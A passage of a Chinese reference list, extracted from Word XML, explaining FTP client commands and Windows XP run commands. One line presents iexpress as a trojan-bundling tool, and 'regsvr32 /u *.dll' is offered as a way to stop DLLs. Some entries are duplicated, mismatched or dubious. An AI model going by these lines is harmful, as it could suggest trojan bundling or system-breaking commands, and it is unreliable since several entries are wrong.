local-file[remote-file]：将本地文件追加到远程系统主机，若未指定远程系统文件名，则使用本地文件名。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5.ascii：使用ascii类型传输方式。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6.bell：每个命令执行完毕后计算机响铃一次。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7.bin：使用二进制文件传输方式。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8.bye：退出ftp会话过程。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9.case：在使用mget时，将远程主机文件名中的大写转为小写字母。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10.cd remote-dir：进入远程主机目录。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11.cdup：进入远程主机目录的父目录。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12.chmod mode file-name：将远程主机文件file-name的存取方式设置为mode，如：chmod 777 a.out。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13.close：中断与远程服务器的ftp会话(与open对应)。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14.cr：使用asscii方式传输文件时，将回车换行转换为回行。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15.delete remote-file：删除远程主机文件。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16.debug[debug-value]：设置调试方式， 显示发送至远程主机的每条命令，如：deb up 3，若设为0，表示取消debug。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17.dir[remote-dir][local-file]：显示远程主机目录，并将结果存入本地文件。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18.disconnection：同close。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19.form format：将文件传输方式设置为format，缺省为file方式。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20.get remote-file[local-file]： 将远程主机的文件remote-file传至本地硬盘的local-file。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21.glob：设置mdelete，mget，mput的文件名扩展，缺省时不扩展文件名，同命令行的-g参数。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22.hash：每传输1024字节，显示一个hash符号(#)。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23.help[cmd]：显示ftp内部命令cmd的帮助信息，如：help get。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24.idle[seconds]：将远程服务器的休眠计时器设为[seconds]秒。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25.image：设置二进制传输方式(同binary)。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26.lcd[dir]：将本地工作目录切换至dir。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27.ls[remote-dir][local-file]：显示远程目录remote-dir， 并存入本地文件local-file。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28.macdef macro-name：定义一个宏，遇到macdef下的空行时，宏定义结束。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29.mdelete[remote-file]：删除远程主机文件。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30.mdir remote-files local-file：与dir类似，但可指定多个远程文件，如 ：mdir *.o.*.zipoutfile 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31.mget remote-files：传输多个远程文件。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32.mkdir dir-name：在远程主机中建一目录。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33.mls remote-file local-file：同nlist，但可指定多个文件名。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34.mode[modename]：将文件传输方式设置为modename， 缺省为stream方式。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35.modtime file-name：显示远程主机文件的最后修改时间。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36.mput local-file：将多个文件传输至远程主机。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37.newer file-name： 如果远程机中file-name的修改时间比本地硬盘同名文件的时间更近，则重传该文件。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38.nlist[remote-dir][local-file]：显示远程主机目录的文件清单，并存入本地硬盘的local-file。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39.nmap[inpattern outpattern]：设置文件名映射机制， 使得文件传输时，文件中的某些字符相互转换， 如：nmap $1.$2.$3[$1，$2].[$2，$3]，则传输文件a1.a2.a3时，文件名变为a1，a2。 该命令特别适用于远程主机为非UNIX机的情况。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40.ntrans[inchars[outchars］：设置文件名字符的翻译机制，如ntrans1R，则文件名LLL将变为RRR。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41.open host[port]：建立指定ftp服务器连接，可指定连接端口。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42.passive：进入被动传输方式。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43.prompt：设置多个文件传输时的交互提示。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44.proxy ftp-cmd：在次要控制连接中，执行一条ftp命令， 该命令允许连接两个ftp服务器，以在两个服务器间传输文件。第一条ftp命令必须为open，以首先建立两个服务器间的连接。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45.put local-file[remote-file]：将本地文件local-file传送至远程主机。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46.pwd：显示远程主机的当前工作目录。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47.quit：同bye，退出ftp会话。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48.quote arg1，arg2...：将参数逐字发至远程ftp服务器，如：quote syst.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49.recv remote-file[local-file]：同get。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50.reget remote-file[local-file]：类似于get， 但若local-file存在，则从上次传输中断处续传。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51.rhelp[cmd-name]：请求获得远程主机的帮助。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52.rstatus[file-name]：若未指定文件名，则显示远程主机的状态， 否则显示文件状态。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53.rename[from][to]：更改远程主机文件名。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54.reset：清除回答队列。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55.restart marker：从指定的标志marker处，重新开始get或put，如：restart 130。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56.rmdir dir-name：删除远程主机目录。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57.runique：设置文件名只一性存储，若文件存在，则在原文件后加后缀.1， .2等。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58.send local-file[remote-file]：同put。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59.sendport：设置PORT命令的使用。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60.site arg1，arg2...：将参数作为SITE命令逐字发送至远程ftp主机。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61.size file-name：显示远程主机文件大小，如：site idle 7200。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62.status：显示当前ftp状态。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63.struct[struct-name]：将文件传输结构设置为struct-name， 缺省时使用stream结构。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64.sunique：将远程主机文件名存储设置为只一(与runique对应)。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65.system：显示远程主机的操作系统类型。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66.tenex：将文件传输类型设置为TENEX机的所需的类型。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67.tick：设置传输时的字节计数器。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68.trace：设置包跟踪。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69.type[type-name]：设置文件传输类型为type-name，缺省为ascii，如:type binary，设置二进制传输方式。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70.umask[newmask]：将远程服务器的缺省umask设置为newmask，如：umask 3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71.user user-name[password][account]：向远程主机表明自己的身份，需要口令时，必须输入口令，如：user anonymous my@email。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72.verbose：同命令行的-v参数，即设置详尽报告方式，ftp 服务器的所有响 应都将显示给用户，缺省为on.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73.?[cmd]：同help.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#11 十一：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7：计算机运行命令全集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winver---------检查Windows版本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wmimgmt.msc----打开windows管理体系结构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wupdmgr--------windows更新程序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winver---------检查Windows版本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wmimgmt.msc----打开windows管理体系结构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wupdmgr--------windows更新程序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wscript--------windows脚本宿主设置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write----------写字板winmsd-----系统信息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wiaacmgr-------扫描仪和照相机向导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winchat--------XP自带局域网聊天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mem.exe--------显示内存使用情况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Msconfig.exe---系统配置实用程序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mplayer2-------简易widnows media player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mspaint--------画图板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mstsc----------远程桌面连接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mplayer2-------媒体播放机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magnify--------放大镜实用程序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mmc------------打开控制台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mobsync--------同步命令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dxdiag---------检查DirectX信息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drwtsn32------ 系统医生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devmgmt.msc--- 设备管理器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dfrg.msc-------磁盘碎片整理程序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diskmgmt.msc---磁盘管理实用程序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dcomcnfg-------打开系统组件服务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ddeshare-------打开DDE共享设置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dvdplay--------DVD播放器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stop messenger-----停止信使服务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 start messenger----开始信使服务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notepad--------打开记事本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nslookup-------网络管理的工具向导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ntbackup-------系统备份和还原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narrator-------屏幕"讲述人"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ntmsmgr.msc----移动存储管理器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ntmsoprq.msc---移动存储管理员操作请求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netstat -an----(TC)命令检查接口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syncapp--------创建一个公文包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sysedit--------系统配置编辑器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sigverif-------文件签名验证程序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sndrec32-------录音机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shrpubw--------创建共享文件夹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secpol.msc-----本地安全策略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syskey---------系统加密，一旦加密就不能解开，保护windows xp系统的双重密码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services.msc---本地服务设置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Sndvol32-------音量控制程序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sfc.exe--------系统文件检查器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sfc /scannow---windows文件保护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tsshutdn-------60秒倒计时关机命令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tourstart------xp简介（安装完成后出现的漫游xp程序）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taskmgr--------任务管理器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eventvwr-------事件查看器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eudcedit-------造字程序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explorer-------打开资源管理器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packager-------对象包装程序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perfmon.msc----计算机性能监测程序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progman--------程序管理器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regedit.exe----注册表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rsop.msc-------组策略结果集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regedt32-------注册表编辑器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rononce -p ----15秒关机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regsvr32 /u *.dll----停止dll文件运行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regsvr32 /u zipfldr.dll------取消ZIP支持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cmd.exe--------CMD命令提示符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chkdsk.exe-----Chkdsk磁盘检查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certmgr.msc----证书管理实用程序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calc-----------启动计算器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charmap--------启动字符映射表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cliconfg-------SQL SERVER 客户端网络实用程序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Clipbrd--------剪贴板查看器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conf-----------启动netmeeting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compmgmt.msc---计算机管理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cleanmgr-------**整理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ciadv.msc------索引服务程序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osk------------打开屏幕键盘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odbcad32-------ODBC数据源管理器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oobe/msoobe /a----检查XP是否激活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lusrmgr.msc----本机用户和组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logoff---------注销命令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iexpress-------木马捆绑工具，系统自带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Nslookup-------IP地址侦测器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fsmgmt.msc-----共享文件夹管理器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utilman--------辅助工具管理器 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>gpedit.msc-----组策略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punctuation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AC1671"/>
    <w:rsid w:val="2E23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Shinelon</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2019-02-07T12:08:03Z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